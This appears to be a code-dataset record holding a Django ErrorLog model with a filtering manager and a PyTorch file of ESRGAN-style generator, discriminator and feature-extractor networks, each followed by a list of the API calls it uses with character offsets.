[((72, 115), 'django.conf.urls.url', 'url', (['"""^$"""', 'views.landing'], {'name': '"""landingUrl"""'}), "('^$', views.landing, name='landingUrl')\n", (75, 115), False, 'from django.conf.urls import url\n'), ((121, 191), 'django.conf.urls.url', 'url', (['"""^profile/create"""', 'views.create_profile'], {'name': '"""create_profileUrl"""'}), "('^profile/create', views.create_profile, name='create_profileUrl')\n", (124, 191), False, 'from django.conf.urls import url\n'), ((198, 245), 'django.conf.urls.url', 'url', (['"""^post/create"""', 'views.post'], {'name': '"""postUrl"""'}), "('^post/create', views.post, name='postUrl')\n", (201, 245), False, 'from django.conf.urls import url\n'), ((252, 311), 'django.conf.urls.url', 'url', (['"""^business/create"""', 'views.business'], {'name': '"""businessUrl"""'}), "('^business/create', views.business, name='businessUrl')\n", (255, 311), False, 'from django.conf.urls import url\n'), ((318, 384), 'django.conf.urls.url', 'url', (['"""^business/view"""', 'views.view_business'], {'name': '"""viewBusinessUrl"""'}), "('^business/view', views.view_business, name='viewBusinessUrl')\n", (321, 384), False, 'from django.conf.urls import url\n'), ((391, 443), 'django.conf.urls.url', 'url', (['"""^move/out"""', 'views.move_out'], {'name': '"""move_outUrl"""'}), "('^move/out', views.move_out, name='move_outUrl')\n", (394, 443), False, 'from django.conf.urls import url\n'), ((450, 507), 'django.conf.urls.url', 'url', (['"""^moving/out/(\\\\d+)"""', 'views.moving'], {'name': '"""movingUrl"""'}), "('^moving/out/(\\\\d+)', views.moving, name='movingUrl')\n", (453, 507), False, 'from django.conf.urls import url\n')]
|
from django.db import models
from django.core.validators import MinValueValidator
from django.contrib.auth import get_user_model
User = get_user_model()
class ErrorLogModelManager(models.Manager):
search_fields = ('level', 'description', 'source')
ordering_fields = ('level', '-level', 'events', '-events')
def filter_logs(self, query_params=None):
queryset = ErrorLog.objects.filter(archived=False)
if query_params is not None:
env = query_params.get('env', None)
ordering = query_params.get('ordering', None)
search_field = query_params.get('field', None)
search = query_params.get('search', None)
if env is not None:
queryset = queryset.filter(env__iexact=env)
if ordering is not None and ordering in self.ordering_fields:
queryset = queryset.order_by(ordering)
if search_field is not None and search_field in self.search_fields and search is not None:
field_query = {f'{search_field}__icontains': search}
queryset = queryset.filter(**field_query)
return queryset
class ErrorLog(models.Model):
LOG_LEVELS = (
('CRITICAL', 'CRITICAL'),
('DEBUG', 'DEBUG'),
('ERROR', 'ERROR'),
('WARNING', 'WARNING'),
('INFO', 'INFO'),
)
LOG_ENVIRONMENTS = (
('PRODUCTION', 'PRODUCTION'),
('HOMOLOGATION', 'HOMOLOGATION'),
('DEV', 'DEV'),
)
user = models.ForeignKey(
User, on_delete=models.CASCADE, related_name='logs')
description = models.CharField('Descriรงรฃo', max_length=256)
source = models.GenericIPAddressField('Origem')
details = models.TextField('Detalhes')
events = models.PositiveIntegerField(
'Eventos', default=1, validators=[MinValueValidator(1)])
date = models.DateTimeField('Data')
level = models.CharField('Level', max_length=16, choices=LOG_LEVELS)
    env = models.CharField('Ambiente', max_length=16, choices=LOG_ENVIRONMENTS)
archived = models.BooleanField('Arquivado', default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = ErrorLogModelManager()
class Meta:
verbose_name = 'Error Log'
ordering = ['-created_at']
@property
def owner(self):
return self.user
def archive(self):
self.archived = True
self.save()
def __str__(self):
return self.description
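# Usage sketch (hypothetical query params, e.g. taken from request.GET):
#   logs = ErrorLog.objects.filter_logs(
#       {'env': 'DEV', 'ordering': '-events', 'field': 'level', 'search': 'ERROR'})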
|
[
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.CharField",
"django.core.validators.MinValueValidator",
"django.contrib.auth.get_user_model",
"django.db.models.BooleanField",
"django.db.models.GenericIPAddressField",
"django.db.models.DateTimeField"
] |
[((138, 154), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (152, 154), False, 'from django.contrib.auth import get_user_model\n'), ((1512, 1582), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE', 'related_name': '"""logs"""'}), "(User, on_delete=models.CASCADE, related_name='logs')\n", (1529, 1582), False, 'from django.db import models\n'), ((1618, 1663), 'django.db.models.CharField', 'models.CharField', (['"""Descriรงรฃo"""'], {'max_length': '(256)'}), "('Descriรงรฃo', max_length=256)\n", (1634, 1663), False, 'from django.db import models\n'), ((1677, 1715), 'django.db.models.GenericIPAddressField', 'models.GenericIPAddressField', (['"""Origem"""'], {}), "('Origem')\n", (1705, 1715), False, 'from django.db import models\n'), ((1730, 1758), 'django.db.models.TextField', 'models.TextField', (['"""Detalhes"""'], {}), "('Detalhes')\n", (1746, 1758), False, 'from django.db import models\n'), ((1885, 1913), 'django.db.models.DateTimeField', 'models.DateTimeField', (['"""Data"""'], {}), "('Data')\n", (1905, 1913), False, 'from django.db import models\n'), ((1926, 1986), 'django.db.models.CharField', 'models.CharField', (['"""Level"""'], {'max_length': '(16)', 'choices': 'LOG_LEVELS'}), "('Level', max_length=16, choices=LOG_LEVELS)\n", (1942, 1986), False, 'from django.db import models\n'), ((1997, 2065), 'django.db.models.CharField', 'models.CharField', (['"""Ambiene"""'], {'max_length': '(16)', 'choices': 'LOG_ENVIRONMENTS'}), "('Ambiene', max_length=16, choices=LOG_ENVIRONMENTS)\n", (2013, 2065), False, 'from django.db import models\n'), ((2081, 2128), 'django.db.models.BooleanField', 'models.BooleanField', (['"""Arquivado"""'], {'default': '(False)'}), "('Arquivado', default=False)\n", (2100, 2128), False, 'from django.db import models\n'), ((2147, 2186), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (2167, 2186), False, 'from django.db import models\n'), ((2204, 2239), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (2224, 2239), False, 'from django.db import models\n'), ((1851, 1871), 'django.core.validators.MinValueValidator', 'MinValueValidator', (['(1)'], {}), '(1)\n', (1868, 1871), False, 'from django.core.validators import MinValueValidator\n')]
|
import math
import torch
import torch.nn as nn
from collections import OrderedDict
import torchvision
from torch.nn.utils import spectral_norm
####################
# Basic blocks
####################
def act(act_type, inplace=True, neg_slope=0.2, n_prelu=1):
# helper selecting activation
# neg_slope: for leakyrelu and init of prelu
# n_prelu: for p_relu num_parameters
act_type = act_type.lower()
if act_type == 'relu':
layer = nn.ReLU(inplace)
elif act_type == 'leakyrelu':
layer = nn.LeakyReLU(neg_slope, inplace)
elif act_type == 'prelu':
layer = nn.PReLU(num_parameters=n_prelu, init=neg_slope)
else:
raise NotImplementedError('activation layer [%s] is not found' % act_type)
return layer
def norm(norm_type, nc):
# helper selecting normalization layer
norm_type = norm_type.lower()
if norm_type == 'batch':
layer = nn.BatchNorm2d(nc, affine=True)
elif norm_type == 'instance':
layer = nn.InstanceNorm2d(nc, affine=False)
else:
raise NotImplementedError('normalization layer [%s] is not found' % norm_type)
return layer
def pad(pad_type, padding):
# helper selecting padding layer
# if padding is 'zero', do by conv layers
pad_type = pad_type.lower()
if padding == 0:
return None
if pad_type == 'reflect':
layer = nn.ReflectionPad2d(padding)
elif pad_type == 'replicate':
layer = nn.ReplicationPad2d(padding)
else:
raise NotImplementedError('padding layer [%s] is not implemented' % pad_type)
return layer
def get_valid_padding(kernel_size, dilation):
kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)
padding = (kernel_size - 1) // 2
return padding
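# Worked example: a 3x3 kernel with dilation 2 has an effective extent of
# 3 + (3 - 1) * (2 - 1) = 5, so get_valid_padding(3, 2) returns 2 and the
# spatial size is preserved for stride 1.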
class ConcatBlock(nn.Module):
# Concat the output of a submodule to its input
def __init__(self, submodule):
super(ConcatBlock, self).__init__()
self.sub = submodule
def forward(self, x):
output = torch.cat((x, self.sub(x)), dim=1)
return output
def __repr__(self):
tmpstr = 'Identity .. \n|'
modstr = self.sub.__repr__().replace('\n', '\n|')
tmpstr = tmpstr + modstr
return tmpstr
class ShortcutBlock(nn.Module):
# Elementwise sum the output of a submodule to its input
def __init__(self, submodule):
super(ShortcutBlock, self).__init__()
self.sub = submodule
def forward(self, x):
output = x + self.sub(x)
return output
def __repr__(self):
tmpstr = 'Identity + \n|'
modstr = self.sub.__repr__().replace('\n', '\n|')
tmpstr = tmpstr + modstr
return tmpstr
def sequential(*args):
# Flatten Sequential. It unwraps nn.Sequential.
if len(args) == 1:
if isinstance(args[0], OrderedDict):
raise NotImplementedError('sequential does not support OrderedDict input.')
return args[0] # No sequential is needed.
modules = []
for module in args:
if isinstance(module, nn.Sequential):
for submodule in module.children():
modules.append(submodule)
elif isinstance(module, nn.Module):
modules.append(module)
return nn.Sequential(*modules)
def conv_block(in_nc, out_nc, kernel_size, stride=1, dilation=1, groups=1, bias=True,
pad_type='zero', norm_type=None, act_type='relu', mode='CNA'):
"""
Conv layer with padding, normalization, activation
mode: CNA --> Conv -> Norm -> Act
NAC --> Norm -> Act --> Conv (Identity Mappings in Deep Residual Networks, ECCV16)
"""
    assert mode in ['CNA', 'NAC', 'CNAC'], 'Wrong conv mode [%s]' % mode
padding = get_valid_padding(kernel_size, dilation)
p = pad(pad_type, padding) if pad_type and pad_type != 'zero' else None
padding = padding if pad_type == 'zero' else 0
c = nn.Conv2d(in_nc, out_nc, kernel_size=kernel_size, stride=stride, padding=padding, \
dilation=dilation, bias=bias, groups=groups)
a = act(act_type) if act_type else None
if 'CNA' in mode:
n = norm(norm_type, out_nc) if norm_type else None
return sequential(p, c, n, a)
elif mode == 'NAC':
if norm_type is None and act_type is not None:
a = act(act_type, inplace=False)
# Important!
# input----ReLU(inplace)----Conv--+----output
# |________________________|
# inplace ReLU will modify the input, therefore wrong output
n = norm(norm_type, in_nc) if norm_type else None
return sequential(n, a, p, c)
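# A small sketch of both orderings (illustrative channel counts):
#   cna = conv_block(64, 64, 3, norm_type='batch', act_type='relu', mode='CNA')
#   nac = conv_block(64, 64, 3, norm_type=None, act_type='relu', mode='NAC')
# CNA yields Conv2d -> BatchNorm2d -> ReLU; NAC (with no norm) yields a
# non-inplace ReLU followed by Conv2d, matching the caution in the comment above.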
####################
# Useful blocks
####################
class ResNetBlock(nn.Module):
"""
ResNet Block, 3-3 style
with extra residual scaling used in EDSR
(Enhanced Deep Residual Networks for Single Image Super-Resolution, CVPRW 17)
"""
def __init__(self, in_nc, mid_nc, out_nc, kernel_size=3, stride=1, dilation=1, groups=1, \
bias=True, pad_type='zero', norm_type=None, act_type='relu', mode='CNA', res_scale=1):
super(ResNetBlock, self).__init__()
conv0 = conv_block(in_nc, mid_nc, kernel_size, stride, dilation, groups, bias, pad_type, \
norm_type, act_type, mode)
if mode == 'CNA':
act_type = None
if mode == 'CNAC': # Residual path: |-CNAC-|
act_type = None
norm_type = None
conv1 = conv_block(mid_nc, out_nc, kernel_size, stride, dilation, groups, bias, pad_type, \
norm_type, act_type, mode)
# if in_nc != out_nc:
# self.project = conv_block(in_nc, out_nc, 1, stride, dilation, 1, bias, pad_type, \
# None, None)
# print('Need a projecter in ResNetBlock.')
# else:
# self.project = lambda x:x
self.res = sequential(conv0, conv1)
self.res_scale = res_scale
def forward(self, x):
res = self.res(x).mul(self.res_scale)
return x + res
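# Residual-scaling sketch: EDSR-style networks shrink the residual branch
# before the skip addition, e.g. (assumed values)
#   block = ResNetBlock(64, 64, 64, res_scale=0.1)
# so forward(x) returns x + 0.1 * res(x), which stabilises very deep stacks.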
class ResidualDenseBlock_5C(nn.Module):
"""
Residual Dense Block
style: 5 convs
The core module of paper: (Residual Dense Network for Image Super-Resolution, CVPR 18)
"""
def __init__(self, nc, kernel_size=3, gc=32, stride=1, bias=True, pad_type='zero', \
norm_type=None, act_type='leakyrelu', mode='CNA'):
super(ResidualDenseBlock_5C, self).__init__()
# gc: growth channel, i.e. intermediate channels
self.conv1 = conv_block(nc, gc, kernel_size, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=act_type, mode=mode)
self.conv2 = conv_block(nc + gc, gc, kernel_size, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=act_type, mode=mode)
self.conv3 = conv_block(nc + 2 * gc, gc, kernel_size, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=act_type, mode=mode)
self.conv4 = conv_block(nc + 3 * gc, gc, kernel_size, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=act_type, mode=mode)
if mode == 'CNA':
last_act = None
else:
last_act = act_type
self.conv5 = conv_block(nc + 4 * gc, nc, 3, stride, bias=bias, pad_type=pad_type, \
norm_type=norm_type, act_type=last_act, mode=mode)
def forward(self, x):
x1 = self.conv1(x)
x2 = self.conv2(torch.cat((x, x1), 1))
x3 = self.conv3(torch.cat((x, x1, x2), 1))
x4 = self.conv4(torch.cat((x, x1, x2, x3), 1))
x5 = self.conv5(torch.cat((x, x1, x2, x3, x4), 1))
return x5.mul(0.2) + x
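# Dense-connectivity sketch: each conv sees the block input plus all earlier
# feature maps, so with nc=64 and gc=32 the input widths are 64, 96, 128, 160
# for conv1..conv4 and 64 + 4*32 = 192 for conv5, which fuses everything back
# to nc channels before the scaled (0.2) skip connection.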
class RRDB(nn.Module):
"""
Residual in Residual Dense Block
"""
def __init__(self, nc, kernel_size=3, gc=32, stride=1, bias=True, pad_type='zero', \
norm_type=None, act_type='leakyrelu', mode='CNA'):
super(RRDB, self).__init__()
self.RDB1 = ResidualDenseBlock_5C(nc, kernel_size, gc, stride, bias, pad_type, \
norm_type, act_type, mode)
self.RDB2 = ResidualDenseBlock_5C(nc, kernel_size, gc, stride, bias, pad_type, \
norm_type, act_type, mode)
self.RDB3 = ResidualDenseBlock_5C(nc, kernel_size, gc, stride, bias, pad_type, \
norm_type, act_type, mode)
def forward(self, x):
out = self.RDB1(x)
out = self.RDB2(out)
out = self.RDB3(out)
return out.mul(0.2) + x
####################
# Upsampler
####################
def pixelshuffle_block(in_nc, out_nc, upscale_factor=2, kernel_size=3, stride=1, bias=True,
pad_type='zero', norm_type=None, act_type='relu'):
"""
Pixel shuffle layer
(Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional
Neural Network, CVPR17)
"""
conv = conv_block(in_nc, out_nc * (upscale_factor ** 2), kernel_size, stride, bias=bias,
pad_type=pad_type, norm_type=None, act_type=None)
pixel_shuffle = nn.PixelShuffle(upscale_factor)
n = norm(norm_type, out_nc) if norm_type else None
a = act(act_type) if act_type else None
return sequential(conv, pixel_shuffle, n, a)
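# Channel arithmetic sketch: for upscale_factor r the conv expands channels to
# out_nc * r**2 and nn.PixelShuffle rearranges them into space, e.g. (assumed
# shapes) an input of (1, 64, 24, 24) with out_nc=64, r=2 becomes
# (1, 256, 24, 24) after the conv and (1, 64, 48, 48) after the shuffle.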
def upconv_blcok(in_nc, out_nc, upscale_factor=2, kernel_size=3, stride=1, bias=True,
pad_type='zero', norm_type=None, act_type='relu', mode='nearest'):
# Up conv
# described in https://distill.pub/2016/deconv-checkerboard/
upsample = nn.Upsample(scale_factor=upscale_factor, mode=mode)
conv = conv_block(in_nc, out_nc, kernel_size, stride, bias=bias,
pad_type=pad_type, norm_type=norm_type, act_type=act_type)
return sequential(upsample, conv)
class RRDB_Net(nn.Module):
def __init__(self, in_nc, out_nc, nf, nb, gc=32, upscale=4, norm_type=None, act_type='leakyrelu', \
mode='CNA', res_scale=1, upsample_mode='upconv'):
super(RRDB_Net, self).__init__()
n_upscale = int(math.log(upscale, 2))
if upscale == 3:
n_upscale = 1
fea_conv = conv_block(in_nc, nf, kernel_size=3, norm_type=None, act_type=None)
rb_blocks = [RRDB(nf, kernel_size=3, gc=32, stride=1, bias=True, pad_type='zero', \
norm_type=norm_type, act_type=act_type, mode='CNA') for _ in range(nb)]
LR_conv = conv_block(nf, nf, kernel_size=3, norm_type=norm_type, act_type=None, mode=mode)
if upsample_mode == 'upconv':
upsample_block = upconv_blcok
elif upsample_mode == 'pixelshuffle':
upsample_block = pixelshuffle_block
else:
raise NotImplementedError('upsample mode [%s] is not found' % upsample_mode)
if upscale == 3:
upsampler = upsample_block(nf, nf, 3, act_type=act_type)
else:
upsampler = [upsample_block(nf, nf, act_type=act_type) for _ in range(n_upscale)]
HR_conv0 = conv_block(nf, nf, kernel_size=3, norm_type=None, act_type=act_type)
HR_conv1 = conv_block(nf, out_nc, kernel_size=3, norm_type=None, act_type=None)
self.model = sequential(fea_conv, ShortcutBlock(sequential(*rb_blocks, LR_conv)), \
*upsampler, HR_conv0, HR_conv1)
def forward(self, x):
x = self.model(x)
return x
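# A construction sketch using the common ESRGAN configuration (23 RRDBs,
# 64 features, 4x upscaling); the values here are illustrative, not mandated
# by this file:
#   netG = RRDB_Net(in_nc=3, out_nc=3, nf=64, nb=23, gc=32, upscale=4,
#                   norm_type=None, act_type='leakyrelu', mode='CNA',
#                   upsample_mode='upconv')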
####################
# Discriminator
####################
# VGG style Discriminator with input size 128*128
class Discriminator_VGG_128(nn.Module):
def __init__(self, in_nc, base_nf=64, norm_type='batch', act_type='leakyrelu', mode='CNA'):
super(Discriminator_VGG_128, self).__init__()
# features
# hxw, c
# 128, 64
conv0 = conv_block(in_nc, base_nf, kernel_size=3, norm_type=None, act_type=act_type, \
mode=mode)
conv1 = conv_block(base_nf, base_nf, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 64, 64
conv2 = conv_block(base_nf, base_nf * 2, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv3 = conv_block(base_nf * 2, base_nf * 2, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 32, 128
conv4 = conv_block(base_nf * 2, base_nf * 4, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv5 = conv_block(base_nf * 4, base_nf * 4, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 16, 256
conv6 = conv_block(base_nf * 4, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv7 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 8, 512
conv8 = conv_block(base_nf * 8, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv9 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 4, 512
self.features = sequential(conv0, conv1, conv2, conv3, conv4, conv5, conv6, conv7, conv8, \
conv9)
# classifier
self.classifier = nn.Sequential(
nn.Linear(512 * 4 * 4, 100), nn.LeakyReLU(0.2, True), nn.Linear(100, 1))
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
# VGG style Discriminator with input size 128*128, Spectral Normalization
class Discriminator_VGG_128_SN(nn.Module):
def __init__(self):
super(Discriminator_VGG_128_SN, self).__init__()
# features
# hxw, c
# 128, 64
self.lrelu = nn.LeakyReLU(0.2, True)
self.conv0 = spectral_norm(nn.Conv2d(3, 64, 3, 1, 1))
self.conv1 = spectral_norm(nn.Conv2d(64, 64, 4, 2, 1))
# 64, 64
self.conv2 = spectral_norm(nn.Conv2d(64, 128, 3, 1, 1))
self.conv3 = spectral_norm(nn.Conv2d(128, 128, 4, 2, 1))
# 32, 128
self.conv4 = spectral_norm(nn.Conv2d(128, 256, 3, 1, 1))
self.conv5 = spectral_norm(nn.Conv2d(256, 256, 4, 2, 1))
# 16, 256
self.conv6 = spectral_norm(nn.Conv2d(256, 512, 3, 1, 1))
self.conv7 = spectral_norm(nn.Conv2d(512, 512, 4, 2, 1))
# 8, 512
self.conv8 = spectral_norm(nn.Conv2d(512, 512, 3, 1, 1))
self.conv9 = spectral_norm(nn.Conv2d(512, 512, 4, 2, 1))
# 4, 512
# classifier
self.linear0 = spectral_norm(nn.Linear(512 * 4 * 4, 100))
self.linear1 = spectral_norm(nn.Linear(100, 1))
def forward(self, x):
x = self.lrelu(self.conv0(x))
x = self.lrelu(self.conv1(x))
x = self.lrelu(self.conv2(x))
x = self.lrelu(self.conv3(x))
x = self.lrelu(self.conv4(x))
x = self.lrelu(self.conv5(x))
x = self.lrelu(self.conv6(x))
x = self.lrelu(self.conv7(x))
x = self.lrelu(self.conv8(x))
x = self.lrelu(self.conv9(x))
x = x.view(x.size(0), -1)
x = self.lrelu(self.linear0(x))
x = self.linear1(x)
return x
class Discriminator_VGG_96(nn.Module):
def __init__(self, in_nc, base_nf=64, norm_type='batch', act_type='leakyrelu', mode='CNA'):
super(Discriminator_VGG_96, self).__init__()
# features
# hxw, c
# 96, 64
conv0 = conv_block(in_nc, base_nf, kernel_size=3, norm_type=None, act_type=act_type, \
mode=mode)
conv1 = conv_block(base_nf, base_nf, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 48, 64
conv2 = conv_block(base_nf, base_nf * 2, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv3 = conv_block(base_nf * 2, base_nf * 2, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 24, 128
conv4 = conv_block(base_nf * 2, base_nf * 4, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv5 = conv_block(base_nf * 4, base_nf * 4, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 12, 256
conv6 = conv_block(base_nf * 4, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv7 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 6, 512
conv8 = conv_block(base_nf * 8, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv9 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 3, 512
self.features = sequential(conv0, conv1, conv2, conv3, conv4, conv5, conv6, conv7, conv8, \
conv9)
# classifier
self.classifier = nn.Sequential(
nn.Linear(512 * 3 * 3, 100), nn.LeakyReLU(0.2, True), nn.Linear(100, 1))
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
class Discriminator_VGG_192(nn.Module):
def __init__(self, in_nc, base_nf=64, norm_type='batch', act_type='leakyrelu', mode='CNA'):
super(Discriminator_VGG_192, self).__init__()
# features
# hxw, c
# 192, 64
conv0 = conv_block(in_nc, base_nf, kernel_size=3, norm_type=None, act_type=act_type, \
mode=mode)
conv1 = conv_block(base_nf, base_nf, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 96, 64
conv2 = conv_block(base_nf, base_nf * 2, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv3 = conv_block(base_nf * 2, base_nf * 2, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 48, 128
conv4 = conv_block(base_nf * 2, base_nf * 4, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv5 = conv_block(base_nf * 4, base_nf * 4, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 24, 256
conv6 = conv_block(base_nf * 4, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv7 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 12, 512
conv8 = conv_block(base_nf * 8, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv9 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 6, 512
conv10 = conv_block(base_nf * 8, base_nf * 8, kernel_size=3, stride=1, norm_type=norm_type, \
act_type=act_type, mode=mode)
conv11 = conv_block(base_nf * 8, base_nf * 8, kernel_size=4, stride=2, norm_type=norm_type, \
act_type=act_type, mode=mode)
# 3, 512
self.features = sequential(conv0, conv1, conv2, conv3, conv4, conv5, conv6, conv7, conv8, \
conv9, conv10, conv11)
# classifier
self.classifier = nn.Sequential(
nn.Linear(512 * 3 * 3, 100), nn.LeakyReLU(0.2, True), nn.Linear(100, 1))
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
####################
# Perceptual Network
####################
# Assume input range is [0, 1]
class VGGFeatureExtractor(nn.Module):
def __init__(self,
feature_layer=34,
use_bn=False,
use_input_norm=True,
device=torch.device('cpu')):
super(VGGFeatureExtractor, self).__init__()
if use_bn:
model = torchvision.models.vgg19_bn(pretrained=True)
else:
model = torchvision.models.vgg19(pretrained=True)
self.use_input_norm = use_input_norm
if self.use_input_norm:
mean = torch.Tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1).to(device)
# [0.485-1, 0.456-1, 0.406-1] if input in range [-1,1]
std = torch.Tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1).to(device)
# [0.229*2, 0.224*2, 0.225*2] if input in range [-1,1]
self.register_buffer('mean', mean)
self.register_buffer('std', std)
self.features = nn.Sequential(*list(model.features.children())[:(feature_layer + 1)])
# No need to BP to variable
for k, v in self.features.named_parameters():
v.requires_grad = False
def forward(self, x):
if self.use_input_norm:
x = (x - self.mean) / self.std
output = self.features(x)
return output
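# Perceptual-loss sketch (hypothetical tensors; feature_layer=34 is commonly
# described as the conv5_4 output of VGG19 before the final pooling):
#   netF = VGGFeatureExtractor(feature_layer=34, device=torch.device('cpu'))
#   fea_loss = nn.L1Loss()(netF(sr_img), netF(hr_img).detach())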
# Assume input range is [0, 1]
class ResNet101FeatureExtractor(nn.Module):
def __init__(self, use_input_norm=True, device=torch.device('cpu')):
super(ResNet101FeatureExtractor, self).__init__()
model = torchvision.models.resnet101(pretrained=True)
self.use_input_norm = use_input_norm
if self.use_input_norm:
mean = torch.Tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1).to(device)
# [0.485-1, 0.456-1, 0.406-1] if input in range [-1,1]
std = torch.Tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1).to(device)
# [0.229*2, 0.224*2, 0.225*2] if input in range [-1,1]
self.register_buffer('mean', mean)
self.register_buffer('std', std)
self.features = nn.Sequential(*list(model.children())[:8])
# No need to BP to variable
for k, v in self.features.named_parameters():
v.requires_grad = False
def forward(self, x):
if self.use_input_norm:
x = (x - self.mean) / self.std
output = self.features(x)
return output
class MINCNet(nn.Module):
def __init__(self):
super(MINCNet, self).__init__()
self.ReLU = nn.ReLU(True)
self.conv11 = nn.Conv2d(3, 64, 3, 1, 1)
self.conv12 = nn.Conv2d(64, 64, 3, 1, 1)
self.maxpool1 = nn.MaxPool2d(2, stride=2, padding=0, ceil_mode=True)
self.conv21 = nn.Conv2d(64, 128, 3, 1, 1)
self.conv22 = nn.Conv2d(128, 128, 3, 1, 1)
self.maxpool2 = nn.MaxPool2d(2, stride=2, padding=0, ceil_mode=True)
self.conv31 = nn.Conv2d(128, 256, 3, 1, 1)
self.conv32 = nn.Conv2d(256, 256, 3, 1, 1)
self.conv33 = nn.Conv2d(256, 256, 3, 1, 1)
self.maxpool3 = nn.MaxPool2d(2, stride=2, padding=0, ceil_mode=True)
self.conv41 = nn.Conv2d(256, 512, 3, 1, 1)
self.conv42 = nn.Conv2d(512, 512, 3, 1, 1)
self.conv43 = nn.Conv2d(512, 512, 3, 1, 1)
self.maxpool4 = nn.MaxPool2d(2, stride=2, padding=0, ceil_mode=True)
self.conv51 = nn.Conv2d(512, 512, 3, 1, 1)
self.conv52 = nn.Conv2d(512, 512, 3, 1, 1)
self.conv53 = nn.Conv2d(512, 512, 3, 1, 1)
def forward(self, x):
out = self.ReLU(self.conv11(x))
out = self.ReLU(self.conv12(out))
out = self.maxpool1(out)
out = self.ReLU(self.conv21(out))
out = self.ReLU(self.conv22(out))
out = self.maxpool2(out)
out = self.ReLU(self.conv31(out))
out = self.ReLU(self.conv32(out))
out = self.ReLU(self.conv33(out))
out = self.maxpool3(out)
out = self.ReLU(self.conv41(out))
out = self.ReLU(self.conv42(out))
out = self.ReLU(self.conv43(out))
out = self.maxpool4(out)
out = self.ReLU(self.conv51(out))
out = self.ReLU(self.conv52(out))
out = self.conv53(out)
return out
# Assume input range is [0, 1]
class MINCFeatureExtractor(nn.Module):
def __init__(self, feature_layer=34, use_bn=False, use_input_norm=True, \
device=torch.device('cpu')):
super(MINCFeatureExtractor, self).__init__()
self.features = MINCNet()
self.features.load_state_dict(
torch.load('../experiments/pretrained_models/VGG16minc_53.pth'), strict=True)
self.features.eval()
# No need to BP to variable
for k, v in self.features.named_parameters():
v.requires_grad = False
def forward(self, x):
output = self.features(x)
return output
def define_F(device, use_bn=False):
if use_bn:
feature_layer = 49
else:
feature_layer = 34
netF = VGGFeatureExtractor(feature_layer=feature_layer, use_bn=use_bn, \
use_input_norm=True, device=device)
netF.eval() # No need to train
return netF
|
[
"torchvision.models.vgg19",
"torch.nn.InstanceNorm2d",
"torch.cat",
"torch.device",
"torch.nn.ReflectionPad2d",
"torch.load",
"torch.nn.Upsample",
"torch.Tensor",
"torch.nn.Linear",
"math.log",
"torchvision.models.resnet101",
"torch.nn.PixelShuffle",
"torch.nn.Conv2d",
"torch.nn.BatchNorm2d",
"torch.nn.MaxPool2d",
"torch.nn.LeakyReLU",
"torch.nn.PReLU",
"torch.nn.ReLU",
"torchvision.models.vgg19_bn",
"torch.nn.Sequential",
"torch.nn.ReplicationPad2d"
] |
